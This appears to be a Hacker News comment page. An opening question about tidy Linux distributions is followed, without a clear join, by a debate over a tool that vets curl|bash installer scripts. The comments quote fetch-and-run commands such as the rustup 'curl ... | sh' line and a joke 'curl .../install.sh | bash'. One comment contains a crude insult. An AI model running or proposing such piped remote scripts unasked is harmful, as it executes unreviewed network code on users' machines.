I have always used Debian / Ubuntu because I started with my server using them and have wanted to keep the same tech stack between server and desktop - and they have a large repository ecosystem. But the fragmentation and often times byzantine layout is really starting to grind my gears. I sometimes find a couple overlapping packages installed, and it requires research and testing to figure out which one has priority (mainly networking...).

Certainly, there is no perfect answer. I am just trying to discover which ones come close.

GrantMoyer · 1d ago
Try Arch Linux. It hits all your points except maybe 5.

1. It symlinks redundant bin and lib directories to /usr/bin, and its packages don't install anything to /usr/local.

2. You can keep most config files in /etc or $XDG_CONFIG_HOME. Occasionally software doesn't follow the standards, but that's hardly the distro's fault.

3. Arch is bleeding edge

4. Arch repos are pretty big, plus thete's the AUR, plus packaging software yourself from source or binaries is practically trivial.

5. Security is not the highest priority over usability. You can configure SELinux and the like, but they're not on by default. See https://wiki.archlinux.org/title/Security.

6. There are few defaults to adhear to on Arch. Users are expected to customize.

Elfener · 1d ago
I switched to NixOS to solve this sort of problem.

Configuration of system-wide things is done in the nix langauge in one place.

It also has the most packages of any distro.

And I found packaging to be more approachable than other distros, so if something isn't packaged you can do it properly rather than just curl|bash-ing.

lima · 1d ago
The only distros that are cleanly customizable are declarative ones approaches like NixOS or guix.
speed_spread · 1d ago
I'm using Fedora Kinoite with distrobox. My development envs are containerized. This makes it easy to prevent tech stacks from interfering and also provides some security because any damage should be contained to the container. It does add initial overhead to the setup but once you get going it's great.
Sanzig · 1d ago
I wonder if domain validation might be a good addition to this? You could encode a public key in a TXT record for the domain, and if present, vet could check a signature in the shell script against the key in the TXT record. It wouldn't stop attacks where the owner lost control of the DNS records, but it would stop the "webserver hijack" attack vector.
goku12 · 1d ago
That's what they do in DKIM signing of emails. But if you want to go that route, there are easier solutions. For example, Github and Gitlab expose your SSH keys at a specific URL. You could use those (for ssh signing) if you trust the account. Another even easier method is to use something like cosign (sigstore) if you trust a PKI. Or you could use WebFinger to advertise signify keys or Web Key Directory (WKD) to expose OpenPGP keys, etc.
maxboone · 1d ago
TLSA records exist, but are for the entire server rather than a single binary or script.
tyingq · 1d ago
An option to run the potentially harmful script in a rootless container, then dump filesystem diffs, audit events, etc...might be helpful.

I get containers aren't perfect isolation, but...

ilyagr · 1d ago
One option is https://github.com/binpash/try

It is Linux-only, though.

eptcyka · 1d ago
Could do it in a VM too.
burnt-resistor · 13h ago
The greater problem pattern is not running first inside of a sandbox and auditing the various food groups including dependencies, network interactions, modifications, and final results.

In reality, system packaging and configuration management tend to be the preferred way outs at scale rather than creating system entropy of ("here, run this script").

Btw, there is a tool on debian I abuse to replace system dependencies and package things (in lieu of checkinstall) called equivs. And, to find changes, I use cruft-ng which depends upon plocate.

bugsMarathon88 · 1d ago
The solution to executing untrusted code is not to execute more untrusted code, especially through a tool which has not itself been "vetted".
oytis · 12h ago
Can't see what security it adds at all. The whole looks like a lot like enterprise-quality fizzbuzz, with the core being a small script essentially doing `curl | bash`, but much more verbosely - and a lot of boilerplate (tests, packaging etc.) around it.
jimmaswell · 1d ago
Had there been a single notable incident of curlbash leading to a malware outbreak that this would have prevented?
stouset · 1d ago
No, because if someone can compromise your curlbash, they can just as easily compromise the binary package you’re installing with it.
TZubiri · 1d ago
Lol
djha-skin · 1d ago
I love articles like these that show me new tools instead of showing me new AI tricks. This is the kind of thing I'm in on Hacker News for. I missed the 2010s because people were writing tools for other people. Nowadays it's all about how can I get AI to write it for me poorly.
jwilk · 1d ago
If bat is not available, vet uses less, which is not a faithful pager:

https://github.com/jwilk/unfaithful-less

It seems at least some versions of bat have the same problem, but I didn't look into the details.

dgl · 17h ago
wpollock · 16h ago
For Linux, I used to use checkinstall to create a package when installing from make. It watches the make, and adds an uninstall. Works for several package management systems such as .rpm and .deb.

For Cmake there is a similar tool I believe, Cpack.

Is there any such tool for shell script installers?

chromehearts · 1d ago
ojosilva · 1d ago
Funny, I had this need just today, but with a not-so-popular GitHub repo I cloned today. Before running it, I opened the folder in Cursor and requested a check for suspicious activities, which after a good scan of README and source files, Cursor reported back that it was ok to proceed.

I think getting an (optional?) AI heads-up before reviewing it myself would be great for cURL shell scripts as well. I'm prone to not seeing dark patterns in editor, and tools like vet could as well be tricked into not seeing the dark pattern, malicious intent, or just hazardous code lurking.

alienbaby · 1d ago
I wouldn't quite trust an AI's opinion in wether given code is malicious or not, maybe in the future, but not quite yet.
MathMonkeyMan · 14h ago
I do this:

    $ curl 'https://who.knows.man/installer.sh' >/tmp/install
    $ vim /tmp/install
    [... time passes ...]
    $ sh /tmp/install
jraph · 1d ago
Nice. Next step: provide an interactive shell (plugin) that detects curl | (ba)sh and suggests running vet instead.
evertheylen · 1d ago
Another approach I wrote to protect your system from untrusted dependencies (for Linux devs): https://evertheylen.eu/p/probox-intro/

Happy to hear other people's thoughts!

fsckboy · 1d ago
a zillion comments here and it's not mentioned yet:

packages are installed as root/admin with elevated privilege

packages are run as ordinarly lusers

this is why curl|bash is a more dangerous thing to do.

traditionally, the people with the root password were experienced and trained for this type of analysis, but with personal machines this line of defense does not exist

yes, there are scripts also built into package installers. now you can understand why there shouldn't be, or at least the post-install script can be inspected (this is a major benefit of scripts)

all the noise you want to make about how different distros make the problem harder is part of the problem if your solution is to capitulate to practices which are unsafe-by-design

neilv · 1d ago
Some municipalities operate relatively safe locations where drug addicts can shoot up.

But it the conventional wisdom is that it's better not to shoot up at all.

Kinrany · 1d ago
What does it do about the curl|bash itself downloading software at runtime?
krunck · 1d ago
That's why you need to inspect the script.
stouset · 1d ago
And if I—an evildoer—leave the script alone and simply replace the installed binaries with compromised ones?
marssaxman · 1d ago
I wonder what this program's `diff` feature is intended for? I can't think of a time when I've wanted to run the same install script more than once.
lorenzohess · 1d ago
curl github.com/vet-run/install.sh | bash
codedokode · 1d ago
This shows how bad things are in Linux land and how unfriendly Linux is for third-party apps. The idea that someone will package every application for every Linux distribution is delusional. The proper solution is to provide a standard API and make applications against this API. And of course there should be a sandbox for third-party apps.

Compare this to Windows where there is a standard API, standard set of pre-installed fonts and libraries, you download an exe and it "just works". However Windows has no sandbox and is not secure at all if you install any third-party apps. There are antiviruses, but they cannot guarantee detection of malicious code, and do not even try to block less malicious code like tracking and telemetry.

One might notice that there are Snap/Flatpak, however the issue with them is that the applications there mostly not work properly and have lot of bugs. Also they do not sandbox properly, for example, do not prevent reading serial numbers of equipment.

globular-toast · 10h ago
There are some more obvious things you should do (in order):

1. Have backups. You are running software all the time that can corrupt your files either maliciously or, more likely, accidentally. It doesn't really matter where it comes from,

2. Get into the habit of running things in sandboxes. You don't need anything magical here, a separate (unprivileged) user account is a good enough sandbox for many things. I outline an approach for installing Calibre like this on my blog[0] (the official site uses the `curl ... | sudo sh` pattern!)

You could do more clever things like using bwrap[1] to isolate things, or use a distro designed for this kind of thing. Be aware if using a separate user account that your home directory might still be readable so if you're worried about privacy check that, or use bwrap so it's not exposed at all.

[0] https://blog.gpkb.org/posts/calibre-rootless-install/

[1] https://github.com/containers/bubblewrap

do_not_redeem · 1d ago
It's crazy that so much ink is spilled on curl | bash, but then those same people will happily run the 50MB binary it downloads for you without a second thought. Someone explain this to me, please.

Let's consider rust: https://www.rust-lang.org/tools/install

Specifically, consider these two files:

A. a shell script, written by the Rust core developers, hosted on the Rust official website behind TLS

B. a compiler binary, written by the Rust core developers, hosted on the Rust official website behind TLS

Why is everyone so afraid of A, but not afraid of B?

bongodongobob · 1d ago
Tired of pointless "security" nonsense. This is silly.
lofaszvanitt · 18h ago
This is dangerous. The script could be malicious, the server could be compromised, or a transient network error could result in executing a partial script.

----

0.001% chance. But ok.

lodefende · 23h ago
Hahaah sistema opcional?
exitb · 1d ago
I was hoping this would have a curl | bash installer. Was not disappointed!
xyst · 1d ago
Can’t recall the last time I used `curl … | bash` to install anything on personal or remote devices.

Switched to nix + home-manager as a package manager to replace defacto package managers on some operating systems (ie, darwin uses macports or homebrew).

In cases where the package isn’t available in nixpkgs, can create my own derivation and build it from source.

If I am super paranoid, spin up sandboxed vm with minimal nixos. Use nixos-anywhere to setup vm. Install/build suspicious package. Then do reconnaissance. Nuke the vm after I am done.

Nix, like any other software, isn’t fool proof. Something is likely to get through. In that case, identify the malicious package in nix store. Update your flake to remove/patch software that introduced it. Then nuke the system completely.

Then rebuild system using your declarative system configuration without malicious software.

Is nix for everyone? God no, there’s a massive learning curve. But I will say that once you get past this learning curve, you will never need to install anything with this pattern.

devmor · 1d ago
I like this. Convincing people not to pipe remote scripts to their shell seems like a lost battle, so making it safer to do is a very good mitigation strategy.
superkuh · 1d ago
Indeed. curl | sh is literally the #1 recommended and most common way to install the rust development toolchain (because it changes too rapidly to effectively be in any repos). It's crazy that a language that prioritizes security so highly in it's design itself is only compiled through such insecure methods.

Ref: https://www.rust-lang.org/tools/install

    >Using rustup (Recommended)

    >It looks like you’re running macOS, Linux, or another Unix-like OS. To download Rustup and install Rust, run the following in your terminal, then follow the on-screen instructions. See "Other Installation Methods" if you are on Windows.

    >curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
kibwen · 1d ago
> such insecure methods

No, your security model is flawed. curl-to-bash is equivalent to running arbitrary code on your device. If the Rust developers wanted to root you, they could easily just put the backdoor into the compiler binary that you are asking to receive from them.

mustache_kimono · 1d ago
> curl | sh is literally the #1 recommended and most common way to install the rust development toolchain

Rust provides a uniform way to install on any Unix you say? Compared to polyglot boarding house which is Linux package management?

> because it changes too rapidly to effectively be in any repos

rustup is also installable via your package manager, but, if it isn't, that's kinda your own distro's problem. The problem is that Linux is non-uniform. The problem is not Rust for providing a uniform, lowest common denominator, method for Unix. Notice Windows doesn't have the same problem.

See: https://rust-lang.github.io/rustup/installation/other.html

> It's crazy that a language that prioritizes security so highly in it's design itself is only compiled through such insecure methods.

Compiled?

Please explain the material security differences between the use of rustup.rs method vs. using a package manager.

I'll wait.

goku12 · 1d ago
That's a misunderstanding. You can completely avoid the curl bash pattern if you can install the rustup binary and setup the relevant environment variables (like PATH) manually. Everything else, including cargo and various toolchain versions are installed and managed by rustup. And rustup doesn't have as much churn as the rest of the tools. So, rustup can be (and is) packaged for many distributions. That's all that's necessary in practice. They recommend curl bash because it automates all the above in a single script without exposing such lengthy explanations to a beginner.
pixelesque · 1d ago
What exactly are you arguing?

The Parent poster is arguing that the "recommended" way documented on the Rust website to install rustup is using curl bash, and you're saying "it's possible to do things manually".

How is that helpful to the vast majority of the people on Mac/Linux trying to install Rust from scratch and reading the instructions on the website?

goku12 · 21h ago
> What exactly are you arguing?

This part:

> ... to install the rust development toolchain (because it changes too rapidly to effectively be in any repos)

Rust toolchain is installed using rustup, not curl bash. It's rustup that's installed using curl bash. And while the site does recommend it, installing rustup alone securely is far easier than the entire toolchain.

> How is that helpful to the vast majority of the people on Mac/Linux trying to install Rust from scratch and reading the instructions on the website?

If you're concerned about running a remote script, just check how much work the script actually does. If it's not much, it may be worth exploring the alternative ways for it. For example, the rustup package in Arch Linux [1] does the same thing as what you get from curl bash.

I have mise installed - another package which recommends installation using curl bash. But I don't use it, because it's really easy to install it manually. And when some other tool recommends curl bash, I check if it's supported by mise. As it turns out, rustup can be installed using mise [2].

[1] https://wiki.archlinux.org/title/Rust#Arch_Linux_package

[2] https://mise.jdx.dev/lang/rust.html

navels · 1d ago
same parent had said "It's crazy that a language that prioritizes security so highly in it's design itself is only compiled through such insecure methods."
superkuh · 1d ago
>You can completely avoid the curl bash pattern if you can install the rustup binary and setup the relevant environment variables (like PATH) manually.

Are you saying that if you avoid the curl bash pattern then you can avoid the curl bash pattern? This is true, and trivial, and completely irrelevant to what the rust website recommends and what most people do.

There's definitely been a misunderstanding. The misunderstanding is that you think people are installing rust from rustup from their repos. The website shows you this is not the most common case.

I do get your point that it doesn't have to be this way anymore. That rustup itself could be in repos and still work (even rustc/etc can't). But this is not not how it has been done for rust's entire existence and change is slow and hard. Is there a single distro that does do this now?

kibwen · 1d ago
> That rustup itself could be in repos and still work

So surely you acknowledge that rustup not being in any given distro's repo isn't something that the Rust developers have control over? How do you expect the Rust devs to distribute the compiler? If you want to build from source, that's extremely easy. For people who want convenient binaries, Rust also offers binaries via the most convenient means available, which is curl-to-bash. This isn't a security flaw any more than running the compiler itself is.

veber-alex · 1d ago
rustup is available on plenty of distros now, and it's on homebrew in macOS.

The Rust docs should really offer installation methods other than curl | sh. Not from a security standpoint (I think that's nonsense) but I just don't like polluting my system with random stuff that is not managed by a package manager.

Edit: Yes, there is an "other installation methods" link, but the text makes it sound like it is only applicable for Windows.

shadowgovt · 1d ago
This is probably the key idea in this specific context: the tool you're downloading is a compiler. If you don't trust the bash script hosted by the compiler's creators (assuming you're properly certificate-checking the curl connection and not bypassing TLS), why would you trust the compiler binary it's trying to install?
superkuh · 1d ago
I trust Debian to vet and package things in a way that won't break my desktop. I don't trust the Rust organization because their goals are very different.
mustache_kimono · 1d ago
> I trust Debian to vet and package things in a way that won't break my desktop.

Um, has there been some instance where rustup broke a desktop? And I'm assuming Debian has actually delivered on this worst case scenario?

shadowgovt · 1d ago
Debian's done a pretty good job here. If you run unstable you'll get up to Rust 1.85 (whereas the project home will get you 1.88).

Of course, it's Debian; stable is alllll the way back on 1.63, state of the art in 2022.

mustache_kimono · 21h ago
> Debian's done a pretty good job here.

I meant I bet Debian has broke desktops with a simple `apt update`. Whereas show me where rustup has broken a desktop?

shadowgovt · 1d ago
I'm not sure how that's relevant for rust. I'm trying to think of a way they could distribute the rust toolchain that would break your desktop; does your desktop have a native rust install that other pieces of the distro are relying on to have a particular configuration (like the gcc most distros ship with) that a curl | bash installed toolchain would interfere with?
superkuh · 1d ago
>you acknowledge that rustup not being in any given distro's repo isn't something that the Rust developers have control over

The lack is a consequence of the type of language rust developers chose to be. One that is constantly, rapidly (over just a few months) changing itself in forwards incompatible ways. Other languages don't really have this problem. Even c++ you only have breaking changes every 3-4 years which can be handled by repos. But 3 months old rustc in $distro repos is already fairly useless. Not because rust is a bad language, but because the types of people that write in rust are all bleeding edge early adopters and always use $latest when writing. In another decade or so when the rust developer demographics even out a bit it will probably be okay.

goku12 · 20h ago
> The misunderstanding is that you think people are installing rust from rustup from their repos.

No. The misunderstanding is that you decided that I was talking about how people choose to install rustup, while I didn't even mention it. My reply was entirely about how the entire rust toolchain doesn't have to be in the distro repo. Here's the part in the original comment that I was referring to as a misunderstanding:

> to install the rust development toolchain (because it changes too rapidly to effectively be in any repos).

> This is true, and trivial, and completely irrelevant to what the rust website recommends and what most people do.

Irrelevant to you perhaps. But it's a relevant detail if you're an individual user/developer who cares about security. It's easy to entirely skip the curl bash pattern for rust if you care enough.

The question of why the website recommendeds it is moot because they wrote the script and vetted it among themselves. They have no reason to mistrust it. Meanwhile, the security culture of the user is not really their concern. It's not unreasonable for them to expect you to read a bash script before you download it from the net and execute it. I did, and that's how I realized that there are alternatives.

If you think that it's unreasonable, look at how many projects, including programming languages recommend the same. The prevailing sentiment among the devs is clear - "Here's a script to do it easily. We haven't put anything harmful in it. But we assume that that's not enough guarantee for you. So just check the script first. It's just non obfuscated bash". I almost always find ways to avoid the curl bash step whenever a project recommends it.

> Is there a single distro that does do this now?

Enjoy the following articles in the Arch Linux, Gentoo and Debian wikis discussing the exact topic. Not only do they have rustup packaged in their repo, rustup even has build configurations to make it behave nicely with the rest of system in such a scenario (like following the FHS and disabling self updates).

[1] https://wiki.archlinux.org/title/Rust#Arch_Linux_package

[2] https://wiki.gentoo.org/wiki/Rust#Rustup

[3] https://wiki.debian.org/Rust

nailer · 1d ago
Reminder that the pattern has the same risk as downloading software that you haven’t audited and verified the binary matches the source.
mrspuratic · 1d ago
Reminder that there is the reductive argument that basically everything you download is arbitrary code, but throwing away the code that is run seems uniquely silly.
aflag · 1d ago
How is it silly to throw away code that you'll run only once?
nailer · 1d ago
> Reminder that there is the reductive argument that basically everything you download is arbitrary code

I'm not sure why you think pointing out the risk of regular unaudited unverifiable downloads is reductive as you haven't provided any supporting arguments, only snark. You seem like a cunt.

> throwing away the code that is run seems uniquely silly.

Neither traditional downloads and curl | bash are commonly stored long term for analysis.

lodefende · 23h ago
Gog hacker